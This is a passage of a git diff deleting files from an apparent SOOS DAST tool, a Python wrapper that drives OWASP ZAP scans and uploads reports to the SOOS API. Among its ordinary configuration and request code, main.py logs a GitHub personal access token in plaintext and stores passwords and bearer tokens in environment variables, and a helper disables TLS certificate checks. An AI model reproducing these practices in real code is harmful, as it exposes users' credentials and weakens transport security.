-URI_UPLOAD_DAST_RESULTS_TEMPLATE = "{soos_base_uri}clients/{soos_client_id}/projects/{soos_project_id}/dast-tools/{soos_dast_tool}/analysis/{soos_analysis_id}"
-
-URI_UPLOAD_DAST_RESULTS_TEMPLATE_v2 = "{soos_base_uri}clients/{soos_client_id}/projects/{soos_project_id}/branches/{soos_branch_hash}/scan-types/dast/scans/{soos_analysis_id}"
-
-URI_PROJECT_DETAILS_TEMPLATE = "{soos_base_uri}projects/{soos_project_id}/details"
-
-# LOGS
-LOG_FORMAT = "%(asctime)s %(message)s"
-LOG_DATE_FORMAT = "%m/%d/%Y %I:%M:%S %p %Z"
-
-
-# ZAP SCRIPTS
-ZAP_ACTIVE_SCAN_SCRIPTS_FOLDER_PATH = "/home/zap/.ZAP/scripts/scripts/active/"
-ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH = "/home/zap/.ZAP/scripts/scripts/httpsender/"
diff --git a/helpers/utils.py b/helpers/utils.py
deleted file mode 100644
index 700079a..0000000
--- a/helpers/utils.py
+++ /dev/null
@@ -1,246 +0,0 @@
-from base64 import b64encode
-from datetime import datetime, timedelta
-from html import unescape
-from sys import exit
-from time import sleep
-from typing import Optional, Any, NoReturn, Dict, Iterable
-from urllib.parse import unquote
-
-from requests import Response, get
-from requests.exceptions import (
-    HTTPError,
-)
-
-import helpers.constants as Constants
-from helpers.constants import RETRY_DELAY, REQUEST_TIMEOUT
-from model.log_level import LogLevel, loggerFunc
-from model.target_availability_check import TargetAvailabilityCheck
-
-UTF_8: str = 'utf-8'
-
-
-class ErrorAPIResponse:
-    code: Optional[str] = None
-    message: Optional[str] = None
-
-    def __init__(self, api_response):
-        for key in api_response:
-            self.__setattr__(key, api_response[key])
-
-        self.code = api_response["code"] if "code" in api_response else None
-        self.message = api_response["message"] if "message" in api_response else None
-
-
-def log(message: str, log_level: LogLevel = LogLevel.INFO) -> None:
-    logFunc = loggerFunc.get(log_level)
-    logFunc(str(message))
-
-
-def print_line_separator() -> None:
-    print(
-        "----------------------------------------------------------------------------------------------------------"
-    )
-
-
-def exit_app(e) -> NoReturn:
-    log(str(e), LogLevel.ERROR)
-    exit(1)
-
-
-def valid_required(key, value):
-    if value is None or len(value) == 0:
-        exit_app(key + " is required")
-
-
-def has_value(prop) -> bool:
-    return prop is not None and len(prop) > 0
-
-
-def is_true(prop) -> bool:
-    return prop is True
-
-
-def check_site_is_available(url: str) -> bool:
-    log(f"Waiting for {url} to be available")
-
-    check = False
-    max_time = datetime.utcnow() + timedelta(days=0, minutes=0, seconds=30)
-    attempt = 1
-
-    while datetime.utcnow() < max_time:
-        log(f"Attempt {attempt} to connect to {url}")
-        try:
-            check = __send_ping__(url)
-
-            if check is True:
-                break
-
-            if datetime.utcnow() + timedelta(0, RETRY_DELAY) > max_time:
-                break
-        except Exception as error:
-            pass
-
-        sleep(RETRY_DELAY)
-        attempt = attempt + 1
-
-    return check
-
-
-def __send_ping__(target: str) -> bool:
-    headers = {
-        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
-    }
-    response: Response = get(
-        url=target,
-        headers=headers,
-        timeout=REQUEST_TIMEOUT,
-        verify=False,  # nosec
-        allow_redirects=True,  # nosec
-    )
-
-    return _check_status(response).is_available()
-
-
-def _check_status(response: Response) -> TargetAvailabilityCheck:
-    try:
-        response.raise_for_status()
-    except HTTPError as error:
-        log(f"{type(error).__name__}: {response.status_code}")
-        log(response.text, log_level=LogLevel.DEBUG)
-
-        # 401 status indicates the host is available but may be behind basic auth
-        if response.status_code == 401:
-            return TargetAvailabilityCheck(True, response=response)
-
-        return TargetAvailabilityCheck(
-            False,
-            response=response,
-            unavailable_reason=error,
-        )
-    else:
-        return TargetAvailabilityCheck(True, response=response)
-
-
-def make_call(request) -> Response:
-    attempt: int = 1
-    error_response: Optional[Any] = None
-    error_message: str = "An error has occurred"
-    try:
-        while attempt <= Constants.MAX_RETRY_COUNT:
-            api_response: Response = request()
-
-            if api_response.ok:
-                return api_response
-            else:
-                error_response = api_response
-                log(
-                    f"An error has occurred performing the request. Retrying Request: {str(attempt)} attempts"
-                )
-                attempt = attempt + 1
-
-        if attempt > Constants.MAX_RETRY_COUNT and error_response is not None:
-            error_response = error_response.json()
-            error_message = error_response["message"]
-
-    except Exception as error:
-        log(error)
-
-    exit_app(error_message)
-
-
-def set_generic_value(self, object_key: str, param_key: str, param_value: Optional[Any], is_required=False) -> NoReturn:
-    if is_required:
-        valid_required(param_key, param_value)
-
-    if self[object_key]:
-        self[object_key] = param_value
-
-
-def log_error(api_response: Response) -> None:
-    log(f"Status Code: {api_response.status_code}", log_level=LogLevel.ERROR)
-    if api_response.text is not None:
-        log(f"Response Text: {api_response.text}", log_level=LogLevel.ERROR)
-
-
-def unescape_string(value: str) -> str or None:
-    if value is None:
-        return value
-
-    return unescape(unquote(value))
-
-
-def encode_report(report_json) -> None:
-    if report_json['site'] is not None:
-        for site in report_json['site']:
-            if site['alerts'] is not None:
-                for alert in site['alerts']:
-                    if alert['instances'] is not None:
-                        for instance in alert['instances']:
-                            instance['base64Uri'] = convert_string_to_b64(instance['uri'])
-                            instance['uri'] = Constants.EMPTY_STRING
-
-
-def convert_string_to_b64(content: str) -> str:
-    message_bytes = content.encode(UTF_8)
-    base64_bytes = b64encode(message_bytes)
-    base64_message = base64_bytes.decode(UTF_8)
-    return base64_message
-
-
-def process_custom_cookie_header_data(data: str) -> Dict:
-    values: Dict = dict()
-
-    if data is not None:
-        dataModified = data.replace('[', Constants.EMPTY_STRING).replace(']', Constants.EMPTY_STRING)
-        for value in dataModified.split(','):
-            dict_key, dict_value = value.split(':')
-            values[dict_key] = dict_value
-
-    return values
-
-
-def read_file(file_path):
-    with open(file=file_path, mode=Constants.FILE_READ_MODE, encoding=Constants.UTF_8_ENCODING) as file:
-        return file.read()
-
-
-def write_file(file_path, file_content):
-    with open(file=file_path, mode=Constants.FILE_WRITE_MODE, encoding=Constants.UTF_8_ENCODING) as file:
-        file.write(file_content)
-        file.close()
-
-
-def handle_response(api_response):
-    if api_response.status_code in range(400, 600):
-        return ErrorAPIResponse(api_response.json())
-    else:
-        if api_response.reason == "No Content":
-            return None
-        else:
-            return api_response.json()
-
-
-def handle_error(error: ErrorAPIResponse, api: str, attempt: int, max_retry: int):
-    error_message = f"{api} has an error. Attempt {str(attempt)} of {str(max_retry)}"
-    raise Exception(f"{error_message}\n{error.code}-{error.message}")
-
-
-def generate_header(api_key: str, content_type: str):
-    return {'x-soos-apikey': api_key, 'Content-Type': content_type}
-
-
-
-def array_to_str(array: Iterable[str]):
-
-    if array is None or sum(1 for element in array) == 0:
-        return None
-
-    return ' '.join(array)
-
-def array_to_dict(array: Iterable[str]):
-    body = []
-    for key_value in array:
-        print(key_value)
-        key, value = key_value.split(':', 1)
-        body.append((key, value))
-    return body
\ No newline at end of file
diff --git a/main.py b/main.py
deleted file mode 100644
index 0643453..0000000
--- a/main.py
+++ /dev/null
@@ -1,1258 +0,0 @@
-import base64
-import gzip
-import json
-import logging
-import os
-import platform
-import sys
-from argparse import ArgumentParser, Namespace
-from datetime import datetime
-import time
-from typing import List, Optional, Any, Dict, NoReturn
-from collections import OrderedDict
-
-import requests
-import yaml
-from requests import Response, put, post, patch
-
-import helpers.constants as Constants
-from helpers.utils import log, valid_required, has_value, exit_app, is_true, print_line_separator, \
-    check_site_is_available, log_error, unescape_string, read_file, convert_string_to_b64, generate_header, \
-    handle_response, ErrorAPIResponse, array_to_str
-from model.log_level import LogLevel
-
-ANALYSIS_START_TIME = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
-OPERATING_ENVIRONMENT = f'{platform.system()} {platform.release()} {platform.architecture()[0]}'
-ANALYSIS_RESULT_POLLING_INTERVAL = 10 # 10 seconds
-ANALYSIS_RESULT_MAX_WAIT = 300 # 5 minutes
-
-with open(os.path.join(os.path.dirname(__file__), "VERSION.txt"), encoding='UTF-8') as version_file:
-    SCRIPT_VERSION = version_file.read().strip()
-
-class DASTStartAnalysisResponse:
-    def __init__(self, dast_analysis_api_response):
-        self.analysis_id = dast_analysis_api_response[
-            "analysisId"] if "analysisId" in dast_analysis_api_response else None
-        self.branch_hash = dast_analysis_api_response[
-            "branchHash"] if "branchHash" in dast_analysis_api_response else None
-        self.scan_type = dast_analysis_api_response["scanType"] if "scanType" in dast_analysis_api_response else None
-        self.scan_url = dast_analysis_api_response["scanUrl"] if "scanUrl" in dast_analysis_api_response else None
-        self.scan_status_url = dast_analysis_api_response[
-            "scanStatusUrl"] if "scanStatusUrl" in dast_analysis_api_response else None
-        self.errors = dast_analysis_api_response["errors"] if "errors" in dast_analysis_api_response else None
-        self.project_id = dast_analysis_api_response["projectId"] if "projectId" in dast_analysis_api_response else None
-        if self.project_id is None:
-            self.project_id = dast_analysis_api_response[
-                "projectHash"] if "projectHash" in dast_analysis_api_response else None
-
-
-class SOOSDASTAnalysis:
-
-    def __init__(self):
-        self.client_id: Optional[str] = None
-        self.api_key: Optional[str] = None
-        self.project_name: Optional[str] = None
-        self.base_uri: Optional[str] = None
-        self.scan_mode: Optional[str] = None
-        self.fail_on_error: Optional[str] = None
-        self.target_url: Optional[str] = None
-        self.rules_file: Optional[str] = None
-        self.context_file: Optional[str] = None
-        self.user_context: Optional[str] = None
-        self.api_scan_format: Optional[str] = None
-        self.debug_mode: bool = False
-        self.app_version: Optional[str] = None
-        self.ajax_spider_scan: bool = False
-        self.spider_minutes: Optional[int] = 120
-        self.report_request_headers: bool = False
-        self.on_failure: Optional[str] = None
-        self.update_addons: bool = False
-
-        # Special Context - loads from script arguments only
-        self.commit_hash: Optional[str] = None
-        self.branch_name: Optional[str] = None
-        self.branch_uri: Optional[str] = None
-        self.build_version: Optional[str] = None
-        self.build_uri: Optional[str] = None
-        self.operating_environment: Optional[str] = None
-        self.log_level: Optional[str] = None
-        self.zap_options: Optional[str] = None
-        self.request_cookies: Optional[str] = None
-        self.request_header: Optional[str] = None
-
-        # Hardcoded values, used for analysis metadata
-        self.dast_analysis_tool: str = Constants.DEFAULT_DAST_TOOL
-        self.dast_analysis_tool_version: str = Constants.DEFAULT_DAST_TOOL_VERSION
-        self.integration_name: str = Constants.DEFAULT_INTEGRATION_NAME
-        self.integration_type: str = Constants.DEFAULT_INTEGRATION_TYPE
-
-        # Auth Options
-        self.auth_auto: Optional[str] = '0'
-        self.auth_login_url: Optional[str] = None
-        self.auth_username: Optional[str] = None
-        self.auth_password: Optional[str] = None
-        self.auth_username_field_name: Optional[str] = None
-        self.auth_password_field_name: Optional[str] = None
-        self.auth_submit_field_name: Optional[str] = None
-        self.auth_submit_second_field_name: Optional[str] = None
-        self.auth_submit_action: Optional[str] = None
-        self.auth_form_type: Optional[str] = None
-        self.auth_delay_time: Optional[int] = None
-        self.auth_exclude_urls: Optional[str] = None
-        self.auth_display: bool = False
-        self.auth_bearer_token: Optional[str] = None
-        self.oauth_token_url: Optional[str] = None
-        self.oauth_parameters: Optional[str] = None
-
-        self.output_format: Optional[str] = None
-        self.github_pat: Optional[str] = None
-        self.checkout_dir: Optional[str] = None
-        self.sarif_destination: Optional[str] = None
-        self.disable_rules: Optional[str] = None
-
-        # allows passing other command line options directly to the script
-        self.other_options: Optional[str] = None
-
-        self.scan_mode_map: Dict = {
-            Constants.BASELINE: self.baseline_scan,
-            Constants.FULL_SCAN: self.full_scan,
-            Constants.API_SCAN: self.api_scan
-        }
-
-    def parse_configuration(self, configuration: Dict, target_url: str):
-        valid_required("Target URL", target_url)
-        self.target_url = target_url
-        self.log_level = configuration.get("level", LogLevel.INFO)
-        logging.getLogger("SOOS DAST").setLevel(self.log_level)
-        log(json.dumps(configuration, indent=2), log_level=LogLevel.DEBUG)
-        for key, value in configuration.items():
-            if key == "clientId":
-                if value is None:
-                    try:
-                        self.client_id = os.environ.get(Constants.SOOS_CLIENT_ID_KEY)
-                        valid_required(key, self.client_id)
-                    except Exception as error:
-                        exit_app(error)
-                else:
-                    valid_required(key, value)
-                    self.client_id = value
-            elif key == "apiKey":
-                if value is None:
-                    try:
-                        self.api_key = os.environ.get(Constants.SOOS_API_KEY)
-                        valid_required(key, self.api_key)
-                    except Exception as error:
-                        exit_app(error)
-                else:
-                    valid_required(key, value)
-                    self.api_key = value
-            elif key == "apiURL":
-                if value is None:
-                    self.base_uri = Constants.DEFAULT_API_URL
-                else:
-                    self.base_uri = value
-            elif key == "projectName":
-                valid_required(key, value)
-                value = array_to_str(value)
-                self.project_name = unescape_string(value)
-            elif key == "scanMode":
-                valid_required(key, value)
-                self.scan_mode = value
-            elif key == "failOnError":
-                valid_required(key, value)
-                self.fail_on_error = value
-            elif key == "rules":
-                self.rules_file = array_to_str(value)
-            elif key == "debug":
-                self.debug_mode = True
-            elif key == "ajaxSpider":
-                self.ajax_spider_scan = True
-            elif key == "contextFile":
-                self.context_file = array_to_str(value)
-            elif key == "contextUser":
-                self.user_context = value
-            elif key == "fullScanMinutes":
-                self.spider_minutes = value
-            elif key == "apiScan":
-                self.api_scan_format = value["format"]
-            elif key == "apiScanFormat":
-                self.api_scan_format = value
-            elif key == "commitHash":
-                self.commit_hash = value
-            elif key == "branchName":
-                value = array_to_str(value)
-                self.branch_name = value
-            elif key == "buildVersion":
-                self.build_version = value
-            elif key == "branchURI":
-                self.branch_uri = value
-            elif key == "buildURI":
-                self.build_uri = value
-            elif key == "operatingEnvironment":
-                value = array_to_str(value)
-                self.operating_environment = value
-            elif key == "integrationName":
-                if value is None:
-                    self.integration_name = Constants.DEFAULT_INTEGRATION_NAME
-                else:
-                    value = array_to_str(value)
-                    self.integration_name = value
-            elif key == "integrationType":
-                if value is None:
-                    self.integration_type = Constants.DEFAULT_INTEGRATION_TYPE
-                else:
-                    value = array_to_str(value)
-                    self.integration_type = value
-            elif key == "appVersion":
-                value = array_to_str(value)
-                self.app_version = value
-            elif key == 'authAuto':
-                self.auth_auto = '1'
-            elif key == 'authDisplay':
-                self.auth_display = value
-            elif key == 'authUsername':
-                self.auth_username = value
-            elif key == 'authPassword':
-                self.auth_password = value
-            elif key == 'authLoginURL':
-                self.auth_login_url = value
-            elif key == 'authUsernameField':
-                self.auth_username_field_name = value
-            elif key == 'authPasswordField':
-                self.auth_password_field_name = value
-            elif key == 'authSubmitField':
-                self.auth_submit_field_name = value
-            elif key == 'authSecondSubmitField':
-                self.auth_submit_second_field_name = value
-            elif key == 'authSubmitAction':
-                self.auth_submit_action = value
-            elif key == 'authFormType':
-                self.auth_form_type = value
-            elif key == 'authDelayTime':
-                self.auth_delay_time = value
-            elif key == "zapOptions":
-                value = array_to_str(value)
-                self.zap_options = value
-            elif key == "requestCookies":
-                value = array_to_str(value)
-                self.request_cookies = value
-            elif key == "requestHeaders":
-                value = array_to_str(value)
-                self.request_header = value
-            elif key == "outputFormat":
-                self.output_format = value
-            elif key == "gpat":
-                self.github_pat = value
-            elif key =="bearerToken":
-                self.auth_bearer_token = value
-            elif key == "reportRequestHeaders":
-                self.report_request_headers = True if str.lower(value) == "true" else False
-            elif key == "onFailure":
-                self.on_failure = value
-            elif key == "checkoutDir":
-                self.checkout_dir = value
-            elif key == "sarifDestination":
-                self.sarif_destination = value
-            elif key == "oauthTokenUrl":
-                self.oauth_token_url = value
-            elif key == "oauthParameters":
-                value = array_to_str(value)
-                self.oauth_parameters = value
-            elif key == "sarif" and value is not None:
-                log("Argument 'sarif' is deprecated. Please use --outputFormat='sarif' instead.")
-                sys.exit(1)
-            elif key == "updateAddons":
-                self.update_addons = True if str.lower(value) == "true" else False
-            elif key == "disableRules":
-                self.disable_rules = array_to_str(value)
-            elif key == "otherOptions":
-                self.other_options = array_to_str(value)
-
-    def __add_target_url_option__(self, args: List[str]) -> NoReturn:
-        if has_value(self.target_url):
-            args.append(Constants.ZAP_TARGET_URL_OPTION)
-            args.append(self.target_url)
-        else:
-            exit_app("Target url is required.")
-
-    def __add_rules_file_option__(self, args: List[str]) -> None:
-        if has_value(self.rules_file):
-            args.append(Constants.ZAP_RULES_FILE_OPTION)
-            args.append(self.rules_file)
-
-    def __add_context_file_option__(self, args: List[str]) -> None:
-        if has_value(self.context_file):
-            args.append(Constants.ZAP_CONTEXT_FILE_OPTION)
-            args.append(self.context_file)
-
-    def __add_debug_option__(self, args: List[str]) -> None:
-        if is_true(self.debug_mode):
-            args.append(Constants.ZAP_DEBUG_OPTION)
-
-    def __add_ajax_spider_scan_option__(self, args: List[str]) -> None:
-        if is_true(self.ajax_spider_scan):
-            args.append(Constants.ZAP_AJAX_SPIDER_OPTION)
-
-    def __add_spider_minutes_option__(self, args: List[str]) -> None:
-        if has_value(self.spider_minutes):
-            args.append(Constants.ZAP_SPIDER_MINUTES_OPTION)
-            args.append(self.spider_minutes)
-
-    def __add_format_option__(self, args: List[str]) -> NoReturn:
-        if has_value(self.api_scan_format):
-            args.append(Constants.ZAP_FORMAT_OPTION)
-            args.append(self.api_scan_format)
-        elif self.scan_mode == Constants.API_SCAN:
-            exit_app("Format is required for apiscan mode.")
-
-    def __add_log_level_option__(self, args: List[str]) -> None:
-        if has_value(self.log_level):
-            args.append(Constants.ZAP_MINIMUM_LEVEL_OPTION)
-            args.append(self.log_level)
-
-    def __add_report_file__(self, args: List[str]) -> None:
-        args.append(Constants.ZAP_JSON_REPORT_OPTION)
-        args.append(Constants.REPORT_SCAN_RESULT_FILENAME)
-
-    def __add_hook_params__(self) -> None:
-        log("Adding hook params", LogLevel.DEBUG)
-        if self.auth_login_url is not None:
-            os.environ['AUTH_LOGIN_URL'] = self.auth_login_url
-        if self.auth_username is not None:
-            os.environ['AUTH_USERNAME'] = self.auth_username
-        if self.auth_password is not None:
-            os.environ['AUTH_PASSWORD'] = self.auth_password
-        if self.request_cookies is not None:
-            os.environ['CUSTOM_COOKIES'] = self.request_cookies
-        if self.request_header is not None:
-            os.environ['CUSTOM_HEADER'] = self.request_header
-        if self.auth_bearer_token is not None:
-            os.environ['AUTH_BEARER_TOKEN'] = self.auth_bearer_token
-        if self.auth_display is not None:
-            os.environ['AUTH_DISPLAY'] = str(self.auth_display)
-        if self.auth_submit_field_name is not None:
-            os.environ['AUTH_SUBMIT_FIELD'] = self.auth_submit_field_name
-        if self.auth_submit_second_field_name is not None:
-            os.environ['AUTH_SECOND_SUBMIT_FIELD'] = self.auth_submit_second_field_name
-        if self.auth_submit_action is not None:
-            os.environ['AUTH_SUBMIT_ACTION'] = self.auth_submit_action
-        if self.auth_form_type is not None:
-            os.environ['AUTH_FORM_TYPE'] = self.auth_form_type
-        if self.auth_delay_time is not None:
-            os.environ['AUTH_DELAY_TIME'] = str(self.auth_delay_time)
-        if self.auth_username_field_name is not None:
-            os.environ['AUTH_USERNAME_FIELD'] = self.auth_username_field_name
-        if self.auth_password_field_name is not None:
-            os.environ['AUTH_PASSWORD_FIELD'] = self.auth_password_field_name
-        if self.oauth_token_url is not None:
-            os.environ['OAUTH_TOKEN_URL'] = self.oauth_token_url
-        if self.oauth_parameters is not None:
-            os.environ['OAUTH_PARAMETERS'] = self.oauth_parameters
-        if self.disable_rules is not None:
-            os.environ['DISABLE_RULES'] = self.disable_rules
-
-    def __add_hook_option__(self, args: List[str]) -> None:
-        args.append(Constants.ZAP_HOOK_OPTION)
-        args.append('/zap/hooks/soos_dast_hook.py')
-
-    def __generate_command__(self, args: List[str]) -> str:
-        self.__add_debug_option__(args)
-        self.__add_rules_file_option__(args)
-        self.__add_context_file_option__(args)
-        self.__add_ajax_spider_scan_option__(args)
-        self.__add_spider_minutes_option__(args)
-
-        log(f"Auth Login: {str(self.auth_login_url)}")
-        log(f"Zap Options: {str(self.zap_options)}")
-        log(f"Cookies: {str(self.request_cookies)}")
-        log(f"Github PAT: {str(self.github_pat)}")
-        if (self.scan_mode != Constants.API_SCAN):
-            self.__add_hook_params__()
-            self.__add_hook_option__(args)
-
-        self.__add_report_file__(args)
-      
-        return " ".join(args)
-
-    def baseline_scan(self) -> str:
-        args: List[str] = [Constants.PY_CMD, Constants.BASE_LINE_SCRIPT]
-
-        self.__add_target_url_option__(args)
-
-        return self.__generate_command__(args)
-
-    def full_scan(self) -> str:
-        args: List[str] = [Constants.PY_CMD, Constants.FULL_SCAN_SCRIPT]
-
-        self.__add_target_url_option__(args)
-
-        return self.__generate_command__(args)
-
-    def api_scan(self) -> str:
-        valid_required("api_scan_format", self.api_scan_format)
-        args: List[str] = [Constants.PY_CMD, Constants.API_SCAN_SCRIPT]
-
-        self.__add_target_url_option__(args)
-        self.__add_format_option__(args)
-
-        return self.__generate_command__(args)
-
-    def open_zap_results_file(self):
-        return read_file(file_path=Constants.REPORT_SCAN_RESULT_FILE)
-
-    def __generate_start_dast_analysis_url__(self) -> str:
-        url = Constants.URI_START_DAST_ANALYSIS_TEMPLATE_v2.format(soos_base_uri=self.base_uri,
-                                                                   soos_client_id=self.client_id)
-
-        return url
-
-    def __generate_upload_results_url__(self, project_id: str, branch_hash: str, analysis_id: str) -> str:
-        url = Constants.URI_UPLOAD_DAST_RESULTS_TEMPLATE_v2.format(soos_base_uri=self.base_uri,
-                                                                   soos_client_id=self.client_id,
-                                                                   soos_project_id=project_id,
-                                                                   soos_branch_hash=branch_hash,
-                                                                   soos_analysis_id=analysis_id)
-        return url
-
-    def __generate_project_details_url__(self, project_id: str) -> str:
-        url = Constants.URI_PROJECT_DETAILS_TEMPLATE.format(soos_base_uri=self.base_uri,
-                                                            soos_project_id=project_id)
-        return url
-
-    def __make_soos_start_analysis_request__(self, command: str) -> DASTStartAnalysisResponse:
-        message: str = "An error has occurred Starting the Analysis"
-        try:
-            log("Making request to SOOS")
-            api_url: str = self.__generate_start_dast_analysis_url__()
-            log(f"SOOS URL Endpoint: {api_url}")
-
-            # Validate required fields
-            if self.project_name is None or len(self.project_name) == 0:
-                log("projectName is required", LogLevel.ERROR)
-                sys.exit(1)
-
-            if self.scan_mode is None or len(self.scan_mode) == 0:
-                log("scanMode is required", LogLevel.ERROR)
-                sys.exit(1)
-
-            # Obfuscate sensitive data
-            obfuscated_command = command
-            if self.auth_bearer_token is not None:
-                obfuscated_command = obfuscated_command.replace(self.auth_bearer_token, "********")
-            if self.auth_password is not None:
-                obfuscated_command = obfuscated_command.replace(self.auth_password, "********")
-            if self.auth_username is not None:
-                obfuscated_command = obfuscated_command.replace(self.auth_username, "********")
-            if self.oauth_token_url is not None:
-                obfuscated_command = obfuscated_command.replace(self.oauth_token_url, "********")
-            
-            param_values: dict = dict(
-                projectName=self.project_name,
-                name=datetime.now().strftime("%m/%d/%Y, %H:%M:%S"),
-                integrationType=self.integration_type,
-                scriptVersion=SCRIPT_VERSION,
-                appVersion=self.app_version,
-                toolName=self.dast_analysis_tool,
-                toolVersion=self.dast_analysis_tool_version,
-                commandLine=obfuscated_command,
-                scanMode=self.scan_mode,
-                commitHash=self.commit_hash,
-                branch=self.branch_name,
-                branchUri=self.branch_uri,
-                buildVersion=self.build_version,
-                buildUri=self.build_uri,
-                operationEnvironment=self.operating_environment or OPERATING_ENVIRONMENT,
-                integrationName=self.integration_name,
-            )
-
-            # Clean up None values
-            request_body = {k: v for k, v in param_values.items() if v is not None}
-
-            error_response: Optional[Any] = None
-
-            data = json.dumps(request_body)
-
-            api_response: Response = post(
-                url=api_url,
-                data=data,
-                headers={"x-soos-apikey": self.api_key, "Content-Type": Constants.JSON_HEADER_CONTENT_TYPE}
-            )
-
-            if api_response.ok:
-                return DASTStartAnalysisResponse(api_response.json())
-            else:
-                log_error(api_response)
-                error_response = api_response
-                log(
-                    "An error has occurred performing the request."
-                )
-
-            if error_response is not None:
-                error_response = error_response.json()
-                message = error_response["message"]
-
-        except Exception as error:
-            log(f"Error: {error}")
-            message = message if message is not None else "An error has occurred Starting the Analysis"
-
-        exit_app(message)
-
-    def __make_soos_scan_status_request__(self, project_id: str, branch_hash: str,
-                                          analysis_id: str, status: str,
-                                          status_message: Optional[str]) -> bool:
-        message: str = "An error has occurred Starting the Analysis"
-        try:
-            log("Making request to SOOS")
-            api_url: str = self.__generate_upload_results_url__(project_id, branch_hash, analysis_id)
-            log(f"SOOS URL Endpoint: {api_url}")
-
-            param_values: dict = dict(
-                status=status,
-                message=status_message
-            )
-
-            # Clean up None values
-            request_body = {k: v for k, v in param_values.items() if v is not None}
-
-            error_response: Optional[Any] = None
-
-            data = json.dumps(request_body)
-
-            api_response: Response = patch(
-                url=api_url,
-                data=data,
-                headers={"x-soos-apikey": self.api_key, "Content-Type": Constants.JSON_HEADER_CONTENT_TYPE}
-            )
-
-            if api_response.ok:
-                return True
-            else:
-                log_error(api_response)
-                error_response = api_response
-                log(
-                    "An error has occurred performing the request"
-                )
-
-            if  error_response is not None:
-                error_response = error_response.json()
-                message = error_response["message"]
-
-        except Exception as error:
-            log(f"Error: {error}")
-            message = message if message is not None else "An error has occurred setting the scan status"
-            self.__make_soos_scan_status_request__(project_id=project_id,
-                                                   branch_hash=branch_hash,
-                                                   analysis_id=analysis_id,
-                                                   status="Error",
-                                                   status_message=message
-                                                   )
-
-        exit_app(message)
-
-    def __make_upload_dast_results_request__(
-            self, project_id: str, branch_hash: str, analysis_id: str
-    ) -> bool:
-        error_response = None
-        error_message: Optional[str] = None
-        try:
-            log("Starting report results processing")
-            zap_report = self.open_zap_results_file()
-            log("Making request to SOOS")
-            api_url: str = self.__generate_upload_results_url__(project_id, branch_hash, analysis_id)
-            log("SOOS URL Upload Results Endpoint: " + api_url)
-            results_json = json.loads(zap_report)
-            log(json.dumps(results_json, indent=2), log_level=LogLevel.DEBUG)
-
-            zap_report_encoded = convert_string_to_b64(json.dumps(results_json))
-            files = {"base64Manifest": zap_report_encoded}
-
-            api_response: Response = put(
-                url=api_url,
-                data=dict(resultVersion=results_json["@version"]),
-                files=files,
-                headers={
-                    "x-soos-apikey": self.api_key,
-                    "Content_type": Constants.MULTIPART_HEADER_CONTENT_TYPE,
-                },
-            )
-
-            if api_response.ok:
-                log("SOOS Upload Success")
-                return True
-            else:
-                error_response = api_response
-                log_error(error_response)
-                log("An error has occurred performing the request")
-
-            if  error_response is not None:
-                error_response = error_response.json()
-                error_message = error_response["message"]
-
-        except Exception as error:
-            log(f"Error: {error}")
-
-        self.__make_soos_scan_status_request__(project_id=project_id,
-                                               branch_hash=branch_hash,
-                                               analysis_id=analysis_id,
-                                               status="Error",
-                                               status_message=error_message
-                                               )
-        exit_app(error_message)
-
-    def publish_results_to_soos(self, project_id: str, branch_hash: str, analysis_id: str, report_url: str) -> None:
-        try:
-            self.__make_upload_dast_results_request__(project_id=project_id, branch_hash=branch_hash,
-                                                      analysis_id=analysis_id)
-
-            print_line_separator()
-            log("Report processed successfully")
-            log(f"Project Id: {project_id}")
-            log(f"Branch Hash: {branch_hash}")
-            log(f"Analysis Id: {analysis_id}")
-            print_line_separator()
-            log("SOOS DAST Analysis successful")
-            log(f"Project URL: {report_url}")
-            print_line_separator()
-
-        except Exception as error:
-            self.__make_soos_scan_status_request__(project_id=project_id,
-                                                   branch_hash=branch_hash,
-                                                   analysis_id=analysis_id,
-                                                   status="Error",
-                                                   status_message="An Unexpected error has occurred uploading ZAP Report Results"
-                                                   )
-            exit_app(error)
-
-    def get_analysis_status_soos(self, result_uri):
-
-        analysis_result_response = None
-        try:
-            analysis_result_response = requests.get(
-                url=result_uri,
-                headers={'x-soos-apikey': self.api_key, 'Content-Type': 'application/json'}
-            )
-
-        except Exception as error:
-            log(f"Analysis Result API Exception Occurred: {error}")
-
-        return analysis_result_response
-
-    def parse_args(self) -> None:
-        parser = ArgumentParser(description="SOOS DAST")
-
-        # DOCUMENTATION
-
-        parser.add_argument('-hf', "--helpFormatted", dest="help_formatted",
-                            help="Print the --help command in markdown table format",
-                            action="store_false",
-                            default=False,
-                            required=False)
-
-        # SCRIPT PARAMETERS
-
-        parser.add_argument(
-            "targetURL",
-            help="Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
-        )
-        parser.add_argument(
-            "--configFile",
-            help="Config File - SOOS yaml file with all the configuration for the DAST Analysis (See https://github.com/soos-io/soos-dast#config-file-definition)",
-            required=False,
-        )
-        parser.add_argument("--clientId", help="SOOS Client ID - get yours from https://app.soos.io/integrate/sca", required=False)
-        parser.add_argument("--apiKey", help="SOOS API Key - get yours from https://app.soos.io/integrate/sca", required=False)
-        parser.add_argument("--projectName", help="Project Name - this is what will be displayed in the SOOS app", nargs="+", required=False)
-        parser.add_argument(
-            "--scanMode",
-            help="Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes)",
-            default="baseline",
-            required=False,
-        )
-        parser.add_argument(
-            "--apiURL",
-            help="SOOS API URL - Intended for internal use only, do not modify.",
-            default="https://api.soos.io/api/",
-            required=False,
-        )
-        parser.add_argument(
-            "--debug",
-            help="Enable to show debug messages.",
-            default=False,
-            type=bool,
-            required=False,
-        )
-        parser.add_argument(
-            "--ajaxSpider",
-            help="Ajax Spider - Use the ajax spider in addition to the traditional one. Additional information: https://www.zaproxy.org/docs/desktop/addons/ajax-spider/",
-            type=bool,
-            required=False,
-        )
-        parser.add_argument(
-            "--rules",
-            help="Rules file to use to INFO, IGNORE or FAIL warnings",
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--contextFile",
-            help="Context file which will be loaded prior to scanning the target",
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--contextUser",
-            help="Username to use for authenticated scans - must be defined in the given context file",
-            nargs="*",
-            required=False,
-        )
-        parser.add_argument(
-            "--fullScanMinutes",
-            help="Number of minutes for the spider to run",
-            required=False,
-        )
-        parser.add_argument(
